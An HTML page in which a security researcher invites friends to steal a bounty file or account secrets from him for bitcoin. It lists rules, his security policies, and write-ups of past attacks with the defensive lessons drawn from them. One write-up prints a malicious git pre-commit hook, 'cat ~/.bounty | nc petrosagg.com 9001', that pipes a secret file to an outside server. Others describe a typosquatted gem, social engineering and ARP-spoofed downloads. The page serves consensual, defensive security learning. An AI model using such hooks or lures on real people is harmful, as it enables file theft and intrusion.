<!DOCTYPE html>
<html>
    <head>
        <meta charset="utf-8">
        <meta http-equiv="X-UA-Compatible" content="IE=edge">
        <meta name="viewport" content="width=device-width, initial-scale=1">

        <title>Hack me</title>
        <!-- Latest compiled and minified CSS -->
        <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.4/css/bootstrap.min.css">

        <link rel="icon" type="image/png"
         href="images/panda.png" />

        <!-- Optional theme -->
        <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.4/css/bootstrap-theme.min.css">

        <style>
            body {
                margin: 15px;
            }
            .bs-callout .media-body.vertical-center {
                padding: 15px 0 0 15px;
            }
            .thumbnail {
                padding-top: 10px;
            }
            .highlight {
                font-weight: bold;
                margin-top: 10px;
                padding: 9px 14px;
                background-color: #f7f7f9;
                border: 1px solid #e1e1e8;
                border-radius: 4px;
            }
            @media (max-width: 900px) {
                .media-left, .media {
                    display: block;
                    float: none;
                }
            }
        </style>

        <link rel='stylesheet' href='callout.css' />
        <!-- Latest compiled and minified JavaScript -->
        <script src='bower_components/jquery/dist/jquery.min.js'></script>
        <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.4/js/bootstrap.min.js"></script>
    </head>
    <body>
        <div class='container'>
            <div class='row'>
                <div class='media'>
                    <div class='media-left'>
                        <img class='media-object' src='images/Multicolor/SVG/Round_Icons/Ninja.svg' width='100' />
                    </div>
                    <div class='media-body'>
                        <h1 class='page-header'>Please hack me.</h1>
                    </div>
                </div>
                <p class='lead'>
                    I encourage you to gain <em>unauthorized</em> access to my computer or accounts.<br />
                    If you do, I'm offering <strong>a treasure hunt</strong> price in <a href='https://bitcoin.org'>bitcoin</a>.
                </p>

                <h2>Bounties</h2>
                <p class='lead'>
                    Try to steal these:
                </p>
                <div class='row text-center'>
                    <div class='col-sm-6 col-md-3'>
                        <div class='thumbnail'>
                            <img src='images/circle/64x64/google.png' alt='gmail' />
                            <div class='caption'>
                                The e-mail with the subject <strong>Bounty secret #1</strong>
                                from <a href='mailto:dionyziz@gmail.com'>my Gmail</a>.

                                <div class='highlight'>฿ 0.4</div>
                            </div>
                        </div>
                    </div>

                    <div class='col-sm-6 col-md-3'>
                        <div class='thumbnail'>
                            <img src='images/circle/64x64/fb.png' alt='facebook' />
                            <div class='caption'>
                                The Facebook note called <strong>Bounty secret #1</strong>
                                from <a href='https://facebook.com/dionyziz'>my Facebook</a>.</li>

                                <div class='highlight'>฿ 0.4</div>
                            </div>
                        </div>
                    </div>

                    <div class='col-sm-6 col-md-3'>
                        <div class='thumbnail'>
                            <img src='images/circle/64x64/twitter.png' alt='twitter' />
                            <div class='caption'>
                                The <strong>direct message</strong> from me to myself on <a href='https://twitter.com'>my Twitter</a>.

                                <div class='highlight'>฿ 0.4</div>
                            </div>
                        </div>
                    </div>

                    <div class='col-sm-6 col-md-3'>
                        <div class='thumbnail'>
                            <img src='images/circle/64x64/files.png' alt='files' />
                            <div class='caption'>
                                The secret file <strong>~/.bounty</strong> from my <strong>personal MacBook</strong>.

                                <div class='highlight'>฿ 0.8</div>
                            </div>
                        </div>
                    </div>
                </div>

                <div class='bs-callout bs-callout-danger'>
                    <h4>No physical violence!</h4>

                    <p>Beating me up or threatening with physical violence is
                    not fair game. Blackmailing or physically stealing my
                    laptop or computer from my hands while I'm using it is also
                    not allowed.</p>

                    <img src='images/security.png' class='img-thumbnail' />
                </div>

                <div class='bs-callout bs-callout-danger'>
                    <div class='media'>
                        <div class='media-left'>
                            <img class='media-object' src='images/Multicolor/SVG/Round_Icons/Burglar.svg' width='100' />
                        </div>
                        <div class='media-body vertical-center'>
                            <h4>No break-ins!</h4>

                            <p>I have not secured my home against physical break-ins.<br />
                            Don't break into my house for these bounties. It's okay if I let you in.</p>
                        </div>
                    </div>
                </div>

                <p>
                    My phone and laptop computer are logged in to Facebook, Twitter, and Gmail. If you manage to
                    find them unlocked, you'll be able to retrieve these.
                </p>

                <p>
                    The point of the game is to educate people on security. If you find a vulnerability, but are
                    unable to fully exploit it, please <strong>let me know</strong>. You may be able to receive a partial
                    bounty without retrieving the hidden treasures.
                </p>

                <h2>Motivation</h2>
                <p>
                    As a security professional, I am required to maintain a certain level of paranoia and
                    best operational security practices when it comes to my accounts and systems. In order
                    to have a rigorous <a href='https://en.wikipedia.org/wiki/Threat_model'>threat model</a>,
                    my security must be associated with a monetary value. Putting a bounty on it gives me
                    a certain amount of confidence that my security has a certain <strong>financial lower bound</strong>.
                </p>

                <h2>Why I need this</h2>
                <p>
                    I work on cryptography and cryptocurrency tools which require high level of security.
                    Access to my computers or accounts could negatively
                    affect the people using my tools.
                </p>
                <p>
                    I am also associated with the <a href='http://www.reddit.com/r/bitcoin'>bitcoin community</a> and a core developer of
                    <a href='https://openbazaar.org/'>OpenBazaar</a>. Access to my computers or accounts by malicious
                    parties could negatively affect my open source projects. Many people rely on my
                    GPG signatures on the OpenBazaar releases and on my commit access to make sure they are secure.
                    If my signatures are to be treated as trustworthy, I need to have some confidence
                    that my systems are secure.
                </p>

                <h2>Hall of fame</h2>

                <div class='bs-callout bs-callout-info'>
                    <div class='media'>
                        <div class='media-left'>
                            <img class='media-object' src='images/petros.jpg' width='120' />
                        </div>
                        <div class='media-body'>
                            <h3 style='margin-top: 0'>Petros Angelatos, <small>February 24rd, 2016</small></h3>

                            <h4>Outcome</h4>
                            <p>
                                <strong>Attack succeeded.</strong>
                                <a href='https://blockchain.info/tx/b1e129b80e050fd96158e9256be2b036db9045eeca9b97c6f43fbe06ffe3be57'>Pay out</a> of <strong>฿ 0.8</strong>.
                            </p>

                            <h4>Full disclosure</h4>
                            <p>
                                I was facing a bug with git during which my repository ended up in a broken state. I was
                                trying to create a minimal testcase in order to file a git bug report. During that process,
                                I shared with Petros, who is a git expert,
                                <a href='https://gist.github.com/dionyziz/5d6894c9b78408ac804b'>my issue on gist</a>, so that
                                we could reproduce together, minimize the testcase further, report
                                the git bug, and write a patch. This gist made it clear to Petros that I am making these tests on my
                                local laptop, which is where my bounty file is located.
                            </p>

                            <p>
                                As I was sharing the issue with Petros, I packed my repository into a tarball and sent it to him.
                                When he received the tarball, he unpacked it and issued a couple of commit commands on his machine.
                                While my tarball was not malicious, at this point he realized this could have been used as an attack
                                vector for arbitrary command execution by including
                                <a href='https://git-scm.com/book/en/v2/Customizing-Git-Git-Hooks'>a pre-commit hook file</a>
                                in the <strong>.git</strong>
                                folder of the tarred repository.
                            </p>

                            <p>
                                In response to this, he decided to attack me using this exact method. He did a couple of commits and claimed he was seeing a certain number of warnings
                                on his local machine. This was a social engineering trick. Subsequently, he packed up a .tar file containing
                                his altered repository and sent it to me, claiming he wanted me to reproduce the warning messages he was seeing.
                            </p>

                            <p>
                                Due to a small mistake in his attack hook, it took two attempts to gain arbitrary command execution on
                                my machine. His first tarball had a hook which only read the first line of my ~/.bounty file; the second
                                attempt used a second tar file which worked properly. The hook file, <strong>.git/hooks/pre-commit</strong>,
                                contained the following simple script:
                            </p>

                            <blockquote>
                                cat ~/.bounty | nc petrosagg.com 9001 || true
                            </blockquote>

                            <p>
                                <strong>petrosagg.com</strong> was his own server in which he was listening on port 9001 for
                                incoming data – in this case my bounty file.
                            </p>

                            <p>
                                While I inspected the repository for malicious contents upon tarball extraction, I only looked at the
                                files tracked within the repository, not within the .git folder, which was the location of the malware.
                            </p>

                            <h4>Security correction</h4>
                            <p>
                                Programs such as git have complicated behaviors. It's impossible to fully understand what all
                                programs do and their special intricacies. These behaviors
                                may evolve over time and some may be underdocumented. Similar behavior can exist in other software such as
                                TeX. Therefore, it is wise to extract such files within a sandboxed environment, even when they seem
                                innocuous.
                            </p>

                            <p>
                                Following this attack, I will extract files sent to me by others in a sandboxed environment, unless they
                                are clearly non-executable (such as images, video, and audio). Folders such as git repositories, compilation
                                of TeX files, renderings of local HTML files, and so on should be ran in sandboxed environments (such as VMs,
                                chroots, or docker), even if it seems that they do not normally have arbitrary command execution. Obviously
                                these are a different case than plain executable, compilable, or interpretable files, but must still be accounted
                                for.
                            </p>
                        </div>
                    </div>
                </div>

                <div class='bs-callout bs-callout-info'>
                    <div class='media'>
                        <div class='media-left'>
                            <img class='media-object' src='images/pkakelas.jpg' width='120' />
                        </div>
                        <div class='media-body'>
                            <h3 style='margin-top: 0'>Dimitris Lamprinos, <small>August 25th, 2015</small></h3>

                            <h4>Outcome</h4>
                            <p>
                                <strong>Attack failed.</strong>
                            </p>

                            <h4>Full disclosure</h4>
                            <p>
                                Dimitris attempted to record my password as I typed it on my laptop. He used a
                                hidden high-FPS GoPro camera. He made multiple attempts while I was living at
                                his home for 10 days. As I lowered the lid of my laptop while typing my password,
                                he was not able to accurately capture my password. The length and unpredictability
                                of my password, as well as the limited amount of days he had, helped eliminate this attack.
                            </p>

                            <h4>Security correction</h4>
                            <p>
                                Be aware of my surroundings when typing my password. Check the surroundings for obvious cameras
                                at the ceiling or behind me and try to have
                                a wall behind me. Monitor people around me while I'm
                                typing: They may be using their phones to record me. Always lower the lid while
                                typing sensitive passwords, even if I am home alone, to make it a habit.
                            </p>
                        </div>
                    </div>
                </div>

                <div class='bs-callout bs-callout-info'>
                    <div class='media'>
                        <div class='media-left'>
                            <img class='media-object' src='images/nikos.jpg' width='120' />
                        </div>
                        <div class='media-body'>
                            <h3 style='margin-top: 0'>Nikos Danopoulos, <small>June 15th, 2015</small></h3>

                            <h4>Outcome</h4>
                            <p>
                                <strong>Attack failed.</strong>
                            </p>

                            <h4>Full disclosure</h4>
                            <p>
                                Nikos claimed he had received a cryptography challenge from his business partner.
                                He claimed it was a program containing a list of questions and answers in the form
                                of a challenge, and challenged me to answer the questions.
                            </p>

                            <p>
                                Before he was willing to send me the challenge, he requested that we screen share
                                over Skype, to make sure I don't simply look at the file for answers. He also challenges
                                me to get a better score than he did. I agree, we do a skype call, and I do a screenshare
                                with him, so he <a href="https://nikosdano.com/dchallenge.txt">sends me the challenge</a>.
                                He adds a backstory to the challenge that includes
                                weird challenge names and a relationship to the person who created them, making it more
                                believable. Of course, nikos was the one who wrote the challenge, but he claimed it was from
                                someone else.
                            </p>

                            <p>
                                I ask if I can <strong>cat</strong> the file and he says "no", because I would then see
                                the answers. I then open up a virtual machine and attempt to move the file into the virtual
                                machine, but nikos claims that the screen sharing is frozen when I look at the virtual machine
                                and he can't observe, which of course was a social engineering lie. I propose to use Teamviewer
                                as an alternative screen sharing mechanism, but he claims to have formatted his computer recently
                                and having difficulty installing Teamviewer, another social engineering lie. I then propose
                                I just play fairly and run the file within the VM without him looking, but he says I can just <strong>cat</strong>
                                it.
                            </p>

                            <p>
                                I <strong>cat</strong> the file on my regular computer and inspect the file overall. It really
                                does look like a list of questions and answers from top to bottom. I see some <strong>echo</strong>
                                statements, some <strong>if</strong> checks and some <strong>read</strong> statements. I don't
                                look too carefully because I don't want to read the answers within the script.
                            </p>

                            <p>
                                I then say "Looks good" and run the script. I see the script downloads a pcap file to use as
                                part of a question, but at this point I realize it was a mistake to run it without careful
                                inspection, so I stop the script. Fortunately, at this point, it was not too late. I open the file
                                in vim and observe that there's a reference to my <strong>bounty</strong> file after more
                                careful inspection. Busted!
                            </p>

                            <p>
                                My reaction to this challenge was embarassingly bad. I ran a file from an untrusted source without
                                careful inspection and without using a virtual machine. I fell victim to simple social engineering
                                techniques and psychological tricks. He was able to use my willingness to trust my friends,
                                my willingness to be challenged, and my willingness to play fair. He also used my sympathy
                                for technology frustration when screen sharing was not working properly and when teamviewer was
                                not installed.
                            </p>

                            <h4>Security correction</h4>

                            <p>
                                I realize the most insecure element of my system and my protection is me. If I decide to break
                                my own policies of always running insecure software within a VM, I am vulnerable. I should be
                                more careful and diligent about running untrusted software. If it's impossible to run within a
                                VM, I should not run it at all, or I should run it on a separate computer. For example, I could
                                run it within an amazon instance. I could also have asked to use Google Hangouts for screensharing,
                                or insisted on installing Teamviewer. I could have insisted on playing fairly within the VM. Finally,
                                the game could have waited a few hours until I set up a Linode instance, which incidentally would
                                be cheaper than paying the challenge payout at my current price.
                            </p>

                            <p>
                                When it comes to policy, I will be more insisting and less polite, regardless of what my friends
                                tell me, and I will not break policy for convenience reasons.
                            </p>
                        </div>
                    </div>
                </div>

                <div class='bs-callout bs-callout-info'>
                    <div class='media'>
                        <div class='media-left'>
                            <img class='media-object' src='images/petros.jpg' width='120' />
                        </div>
                        <div class='media-body'>
                            <h3 style='margin-top: 0'>Petros Angelatos, <small>December 23rd, 2014</small></h3>

                            <h4>Outcome</h4>
                            <p>
                                <strong>Attack failed.</strong>
                            </p>

                            <h4>Full disclosure</h4>
                            <p>
                                Petros claimed to be learning Ruby for a week before this attack. He
                                subsequently contacted me to get help with his Ruby code. He claimed his code
                                doesn't work and shared it with me. It was an innocent-looking piece of ruby
                                code:
                            </p>

                            <blockquote>
                                SimpleHttps.get("https://petrosagg.sexy")
                            </blockquote>

                            <p>
                                Interestingly, it was using the <strong>SimpleHttps</strong> gem, which looks a lot like
                                the official <strong>httpsimple</strong> gem. Petros had published this gem on github
                                under the account name <strong>boris842</strong>, which looks a lot like <strong>boris317</strong>, the
                                name of the original author of <strong>httpsimple</strong>. He also published this gem
                                so that it was installable using <strong>gem install</strong>.
                            </p>

                            <p>
                                Like <strong>pip</strong> and <strong>npm</strong>, there is no check in what code is uploaded, and it
                                can be malicious. Names of gems are first-come-first-serve and can be claimed
                                by anyone.
                            </p>

                            <p>
                                As I was discussing this attack vector recently with colleagues from Google,
                                I went to the github project page to verify its authenticity. I noticed that
                                there were very few stars on the project. If the project had more stars, it's
                                possible that I would have ran this code without further attention. This is
                                not a good idea, as stars can be manipulated using sybil attacks.
                            </p>

                            <p>
                                Upon closer inspection of the source tree, I noticed that the code was
                                authored by <strong>boris317</strong>, the legit author, and almost a year ago, making it
                                look innocent. This was possible, as git commits can be authored arbitrarily
                                and pushed at all. Also, the project did not appear to be a fork. Upon visual
                                inspection of the code, I noticed there was a reference to the
                                <strong>petrosagg.sexy</strong> domain name. Looking closer at the code, I noticed there was
                                a reference to the <strong>.bounty</strong> file.
                            </p>

                            <h4>Security correction</h4>
                            <p>
                                Be more diligent when installing packages using <strong>pip</strong>, <strong>npm</strong>, <strong>gem</strong>. Run
                                untrusted external programs in VMs or docker containers. Make it a policy
                                to run new programs in containers unless they need special privileges.
                            </p>
                        </div>
                    </div>
                </div>

                <div class='bs-callout bs-callout-info'>
                    <div class='media'>
                        <div class='media-left'>
                            <img class='media-object' src='images/mariosal.jpg' width='120' />
                        </div>
                        <div class='media-body'>
                            <h3 style='margin-top: 0'>Mario Saldinger, <small>August 24th, 2014</small></h3>

                            <h4>Outcome</h4>
                            <p>
                                <strong>Attack succeeded.</strong>
                                <a href='https://blockchain.info/tx/ef30a4fe5a908bf0edc9d7483898aa5140a9be04761baf3a05631c6d0e57c454'>Pay out</a> of <strong>฿ 0.0436</strong>.
                            </p>

                            <h4>Full disclosure</h4>
                            <p>
                                Mario was able to access my laptop which I left unlocked for 30 seconds
                                when I went to the bathroom.
                            </p>

                            <h4>Security correction</h4>
                            <p>
                                Make it a point to lock my devices even when I am alone to make it a habit.
                            </p>
                        </div>
                    </div>
                </div>

                <div class='bs-callout bs-callout-info'>
                    <div class='media'>
                        <div class='media-left'>
                            <img class='media-object' src='images/pkakelas.jpg' width='120' />
                        </div>
                        <div class='media-body'>
                            <h3 style='margin-top: 0'>Dimitris Lamprinos, <small>August 16th, 2014</small></h3>

                            <h4>Outcome</h4>
                            <p>
                                <strong>Attack succeeded.</strong> Pay out of <strong>฿ 0.0436</strong>.
                            </p>

                            <h4>Full disclosure</h4>
                            <p>
                                Dimitris was able to access Facebook through my phone which was
                                locked with a password, but I had disabled immediate locking for
                                usability, so my phone was left unlocked while charging.
                            </p>

                            <h4>Security correction</h4>
                            <p>
                                Re-enabled immediate locking, enabled full disk encryption on phone.
                            </p>
                        </div>
                    </div>
                </div>

                <div class='bs-callout bs-callout-info'>
                    <div class='media'>
                        <div class='media-left'>
                            <img class='media-object' src='images/pkakelas.jpg' width='120' />
                        </div>
                        <div class='media-body'>
                            <h3 style='margin-top: 0'>Dimitris Lamprinos, <small>August 14th, 2014</small></h3>

                            <h4>Outcome</h4>
                            <p>
                                <strong>Attack succeeded.</strong>
                                <a href='https://blockchain.info/tx/46680e1de7bb77d99f0cafbf4a308cb5d9541d42e23e917810b94b2895f14eee'>Pay out</a> of <strong>฿ 0.0218</strong>.
                            </p>

                            <h4>Full disclosure</h4>
                            <p>
                                Dimitris was able to access Facebook through my phone which was
                                locked with a pattern that he found by looking as I was drawing it.
                                He was able to look at it because he pretended to be sleeping when
                                I drew it.
                            </p>

                            <h4>Security correction</h4>
                            <p>
                                Changed from pattern to passphrase.
                            </p>
                        </div>
                    </div>
                </div>

                <div class='bs-callout bs-callout-info'>
                    <div class='media'>
                        <div class='media-left'>
                            <img class='media-object' src='images/petros.jpg' width='120' />
                        </div>
                        <div class='media-body'>
                            <h3 style='margin-top: 0'>Petros Angelatos, <small>May 20th, 2010</small></h3>

                            <h4>Outcome</h4>
                            <p>
                                <strong>Attack succeeded.</strong> No payout schedule had been established at the time.
                            </p>

                            <h4>Full disclosure</h4>

                            <p>
                                <strong><a href='https://resin.io/blog/the-chronicle-of-a-wargame/'>A detailed full disclosure
                                    is available on petros' blog</a></strong>. A short version follows.
                            </p>

                            <p>
                                Petros entered my apartment building by
                                tailgating another resident without my presence.
                                He then installed
                                a custom PC which he had built from a modified
                                cable TV decoding system.  He installed this PC
                                at the unlocked elevator control room of my
                                building, which was situated in the 5th floor,
                                close to my apartment which I was residing in
                                on the 4th floor, to achieve good wireless
                                reception. He modified the room's light bulb
                                outlet power socket to pull out a regular power
                                socket with which he powered his PC in the room.

                                He got my WPA WiFi
                                password from a colleague who was visiting me, <a href='https://github.com/chorvus'>chorvus</a>.
                            </p>

                            <p>
                                Petros configured the PC to be robust and reconnect
                                to my WiFi network as soon as it booted up. Using my Internet
                                connection, it then used SSH to connect to one of his public
                                servers. Using that forward SSH connection, he opened a remote
                                SSH tunnel, allowing him to SSH back from his public server to that PC.
                                Thus, he had constant remote access to my local network.
                                He used this network access to ARP spoof the network with ettercap.
                                Using ARP spoofing, he modified the DNS response for certain
                                chosen domain names to point to his own server's IP.
                            </p>

                            <p>
                                At the time, we were working on implementing video calling
                                for our social network, <a href='http://github.com/dionyziz/zino'>Zino</a>.
                                He convinced me to download the new beta version of Skype
                                which featured video calling.

                                When I started the Skype download,
                                he pointed the download link's DNS to his own servers.
                                Since Skype was being downloaded over HTTP, this did not
                                cause any warnings. He then served an appropriate binary
                                file in the place of the regular one. He made sure the
                                served binary was large enough and had the appropriate
                                application icon of Skype.
                                I did
                                not verify HTTPS downloads or signatures at the
                                time, so I ran the downloaded setup binary blindly,
                                thinking my network was trusted. Upon running his
                                custom binary, my system was compromised.
                            </p>

                            <h4>Security correction</h4>
                            <p>
                                Always assume the network is compromised. Only run verified software
                                by ensuring the download is HTTPS from a trusted domain name, GPG-signed
                                with a trusted key, or available through a package manager with an appropriate
                                checksum.
                            </p>
                        </div>
                    </div>
                </div>


                <div class='media'>
                    <div class='media-body'>
                        <h2 class='page-header'>Rules of engagement</h2>

                        <ol style='margin-left: 0'>
                            <li>No university or production system attacks. My colleagues or university don't like being attacked and may prosecute.</li>
                            <li>One pay-out per day.</li>
                            <li>One pay-out per vulnerability.</li>
                            <li>Full disclosure required.</li>
                            <li>No leaving known attack vectors behind after the attack.</li>
                        </ol>

                        <p>Also don't violate my privacy, steal my bitcoins or make GPG signatures in my name. Follow common sense.</p>
                    </div>
                    <div class='media-right'>
                        <img class='media-object' src='images/Multicolor/SVG/Round_Icons/Nuclear-Mushroom.svg' width='100' />
                    </div>
                </div>

                <h2>Why this makes me more secure</h2>
                <p>
                    Typical theoretical treatments of operational security remain problematically unpragmatic even when
                    performed by experienced professionals. As you will see in the list of successful past attacks, even
                    though I am somewhat aware of my security, often <strong>the cheapest and easiest ways of attacking</strong> are
                    unexpected and I tend to be worrying about more advanced problems when I am vulnerable to the simplest
                    possible attacks.
                </p>
                <p>
                    By encouraging white-hat friends and colleagues to attack me and disclose their methods, I am protecting
                    myself against malicious attackers who could attempt targeted concealed and persistent attacks. White-hats
                    and black-hats use similar methodologies. If the bounty is collected, I improve my defences and certain
                    methods are no longer applicable.
                </p>

                <h2>My policies</h2>
                <p>
                    I do not base my security on obscurity. Therefore, I am disclosing my basic policies here so that I can
                    help potential adversaries who are treasure hunting. While I try not to, I may deviate from these policies
                    under social engineering pressure, so even though I may think I am secure, it may be worth a shot. Some of
                    my policies are outlined in the Hall of Fame above.
                </p>
                <ul>
                    <li>I do not run software downloaded via <strong>HTTP</strong>.</li>
                    <li>I run software downloaded via <strong>HTTPS</strong> from a known domain, via my <strong>package manager</strong>, or <strong>GPG-verified</strong>.</li>
                    <li>I use <a href='http://brew.sh/'>homebrew</a> and <a href='http://caskroom.io/'>cask</a> as my package manager. I only install <strong>checksum-</strong> or <strong>HTTPS-protected</strong> packages.</li>
                    <li>I have a <strong>unique password</strong> on my laptop and phone.</li>
                    <li>I keep my laptop and phone software <strong>up to date</strong>.</li>
                    <li>My laptop has <strong>full disk encryption</strong> and a firmware password. Booting from external devices is disabled.</li>
                    <li>My phone has <strong>full disk encryption</strong> enabled and a unique text password.</li>
                    <li>My laptop is a Mid 2012 Retina 15'' <strong>MacBook</strong> Pro.</li>
                    <li>My phone is a <strong>OnePlus 3</strong>.</li>
                    <li>My laptop has a set of <strong>stickers</strong>, two missing <strong>bottom screw pads</strong>, a couple of <strong>burned pixels</strong>, and a
                        <strong>unique avatar image</strong> in its login screen, making it harder to physically imitate.</li>
                    <li>I use <strong>LastPass</strong> to store web passwords.</li>
                    <li>I use ssh, git, svn, and vim. I write tex, python, PHP, HTML/CSS, Javascript (including node), and C/C++.</li>
                    <li><a href='https://github.com/dionyziz/config'>My configuration files are public</a>.</li>
                    <li>I run Chrome, VLC, iTerm, Electrum, Adium (including OTR), Spotify, Signal.</li>
                    <li>I do not download or run unknown <strong>pip</strong> packages, <strong>npm</strong> libraries, or <strong>ruby</strong> gems.</li>
                    <li>I check the <strong>HTTPS protocol</strong>, browser <strong>padlock</strong>, and <strong>domain name</strong> before entering any passwords.</li>
                    <li>I lower my <strong>laptop lid</strong> before entering any valuable password.</li>
                    <li>My phone and laptop are configured to <strong>lock immediately</strong>.</li>
                    <li>I often leave my phone and laptop <strong>unattended</strong> when locked.</li>
                    <li>I will click on any web links you send me without hesitation. I will open your emails and read your instant messages.</li>
                </ul>

                <h2>Other colleagues with bounties</h2>

                <p>
                    Several colleagues are following the bounty game I introduced, as they feel it helps them improve their
                    opsec practices. Their bounties are listed below. Their rules of engagement are similar to those above.
                    If you have a bounty on your machine, let me know and I will add you to this list.
                </p>

                <div class='bs-callout bs-callout-info'>
                    <div class='media'>
                        <div class='media-left'>
                            <img class='media-object' src='images/petros.jpg' width='120' />
                        </div>
                        <div class='media-body'>
                            <h3 style='margin-top: 0'>Petros Angelatos</h3>

                            <h4>Target</h4>
                            <p>
                                Steal the <strong>~/.bounty</strong> file on his linux laptop.
                            </p>

                            <h4>Payout</h4>
                            <p>
                                <strong>0.5 ฿</strong>
                            </p>
                        </div>
                    </div>
                </div>

                <div class='bs-callout bs-callout-info'>
                    <div class='media'>
                        <div class='media-left'>
                            <img class='media-object' src='images/gtklocker.jpg' width='120' />
                        </div>
                        <div class='media-body'>
                            <h3 style='margin-top: 0'><a href='https://gtklocker.com/bounty.txt'>Kostis Karantias</a></h3>

                            <h4>Target</h4>
                            <p>
                                Steal the <strong>~/.bounty</strong> file on his MacBook laptop.
                            </p>

                            <h4>Payout</h4>
                            <p>
                                <strong>50 EUR</strong>
                            </p>

                            <h4>Target</h4>
                            <p>
                                Post the message "Bounty claimed by @Your Name" on <a href='https://www.facebook.com/gtklocker'>his Facebook</a>.
                            </p>

                            <h4>Payout</h4>
                            <p>
                                <strong>5 EUR</strong>
                            </p>
                        </div>
                    </div>
                </div>

                <div class='bs-callout bs-callout-info'>
                    <div class='media'>
                        <div class='media-left'>
                            <img class='media-object' src='images/jim.png' width='120' />
                        </div>
                        <div class='media-body'>
                            <h3 style='margin-top: 0'>Dimitris Karakostas</h3>

                            <h4>Target</h4>
                            <p>
                                Steal the <strong>~/.bounty</strong> file on his linux laptop.
                            </p>

                            <h4>Payout</h4>
                            <p>
                                <strong>50 EUR</strong>
                            </p>
                        </div>
                    </div>
                </div>

                <div class='bs-callout bs-callout-info'>
                    <div class='media'>
                        <div class='media-left'>
                            <img class='media-object' src='images/pkakelas.jpg' width='120' />
                        </div>
                        <div class='media-body'>
                            <h3 style='margin-top: 0'>Dimitris Lamprinos</h3>

                            <h4>Target</h4>
                            <p>
                                Steal the <strong>~/.bounty</strong> file on his Linux laptop.<br />
                            </p>

                            <h4>Payout</h4>
                            <p>
                                <strong>5 EUR</strong>
                            </p>
                        </div>
                    </div>
                </div>


                <div class='bs-callout bs-callout-info'>
                    <div class='media'>
                        <div class='media-left'>
                            <img class='media-object' src='images/kastrinis.jpg' width='120' />
                        </div>
                        <div class='media-body'>
                            <h3 style='margin-top: 0'><a href='http://gkastrinis.info/hackme.html'>George Kastrinis</a></h3>

                            <h4>Target</h4>
                            <p>
                                Steal the <strong>~/.bounty</strong> file on his Linux laptop.<br />
                                Steal the <strong>E:\bounty</strong> file on his Windows 10 desktop.<br />
                                Steal the <strong>email with subject "Bounty secret"</strong> from his gmail.<br />
                                Access <strong>his Facebook</strong>.<br />
                                Access <strong>his Gmail</strong>.<br />
                            </p>

                            <h4>Payout</h4>
                            <p>
                                <strong>5 EUR</strong>
                            </p>
                        </div>
                    </div>
                </div>

                <div style='text-align: center'>
                    <a style='cursor: pointer' data-toggle="modal" data-target="#gpg"><img src='images/Multicolor/SVG/Round_Icons/Key.svg' width='40' /></a>
                </div>

                <div class="modal fade" id="gpg" tabindex="-1" role="dialog" aria-labelledby="gpgLabel" aria-hidden="true">
                  <div class="modal-dialog" style="width: 50%">
                    <div class="modal-content">
                      <div class="modal-header">
                        <button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">&times;</span></button>
                        <h4 class="modal-title" id="myModalLabel">Signed bounty statement</h4>
                      </div>
                      <div class="modal-body">
<pre>
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

I hereby certify that I will pay the amount of 0.4 BTC as a bounty for access
to my Facebook, Twitter, and Gmail accounts, and the amount of 0.8 BTC as a bounty
for access to my personal laptop.

While I intent to make these payments, it remains to my discretion whether an
attack is following the correct rules of engagement, and you trust me to pay you
if you play.

This statement is valid until superseded.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG/MacGPG2 v2.0.20 (Darwin)

iQIcBAEBCAAGBQJVDfkMAAoJELNinf07h9cdL/EQAJ8zVvdnTydJz2l0ERFRLLgn
Xcgw4+F2xnP1MT8vLt43EhJZl0ikkAPFEuwtu6fGw2A1S0qFN0XBUtHwl+58cmc2
QcXaVphihnvY/lfR3Vim7D5cZlHRvIrRnqqzBp9mG1IcaYgsZ5745vgM9sYf7dE2
Rqar/q86mkSPdRwAfbRZi4MOTZ/F6cRQGLBFZNHlErVmBakdxTNxEUL2YaLAXPIA
iVyezMmBVidAJDYoD4wg/YY2Wp+ipjqCpB8vwA9YCEYqVivIgIvMd/FX+1Lj+fAy
6Ch+rcf4FcGfwdW3xpqSmVWCUH0BQQuS3MGVPAdq62I7VoX9UDgdgW5XeO7AfzqS
c9eNsENW3tWVdANupcewZvfX6x2e6GzUxeCrRomoYfLUZey3Obm3K0XnfxhaSBAB
Ys1zBrN/1ja5yhXr84iITF2XHulqDv62TNzZXQazBGP6D7dBdj5gSoQR+edwkujq
ce2Rvq1H0/I5LcL21u/MjNqp1H/SpCGi7r5wx/XECYuCkHF05fduAPTcrP/FBrr+
++0gaBONfogpqqAdnEqlmDf6619RHixc6ttD925vy7AoS19JygDG54A8ZZdYdwVw
Ob5x6r9Kl4maGZMx8mI/iEY9WiBWnpA4XlU83VlJF1rfKiHRWpQIbpdgepL74IrL
yi2Hp/NtyaruAAzkIvBp
=5dUS
-----END PGP SIGNATURE-----
</pre>
                      </div>
                    </div>
                  </div>
                </div>
            </div>
        </div>

        <!-- jQuery (necessary for Bootstrap's JavaScript plugins) -->
        <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.2/jquery.min.js"></script>
        <!-- Include all compiled plugins (below), or include individual files as needed -->
        <script src="bower_components/bootstrap/dist/js/bootstrap.min.js"></script>
    </body>
</html>
